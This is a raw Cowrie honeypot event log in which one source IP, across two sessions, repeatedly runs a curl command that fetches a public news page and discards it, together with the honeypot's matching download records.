{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.163986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.165253Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.171114Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.188949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.190312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.202508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.204390Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.207010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.229298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.230677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.239664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.240786Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.268079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.269472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.273217Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.276427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.277718Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.282359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.293739Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.303337Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.308265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.309436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.313484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.314505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.330932Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.352670Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.353959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.357687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.359097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.361631Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.365467Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.390020Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.393329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.394780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.399284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.400404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.401652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.419865Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.436240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.437649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.441636Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.442780Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.478171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.479147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.496490Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.498093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.501977Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.508389Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.520293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.528614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.529834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.540760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.542128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.557149Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.566393Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.567678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.580419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.581678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.591557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.598142Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.605778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.607122Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.620844Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.622544Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.626507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.627450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.640674Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.645902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.646895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.654422Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.664300Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.667032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.668094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.671550Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.686911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.688028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.695082Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.708155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.709253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:08.726656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.727544Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.731546Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.735111Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:08.748865Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
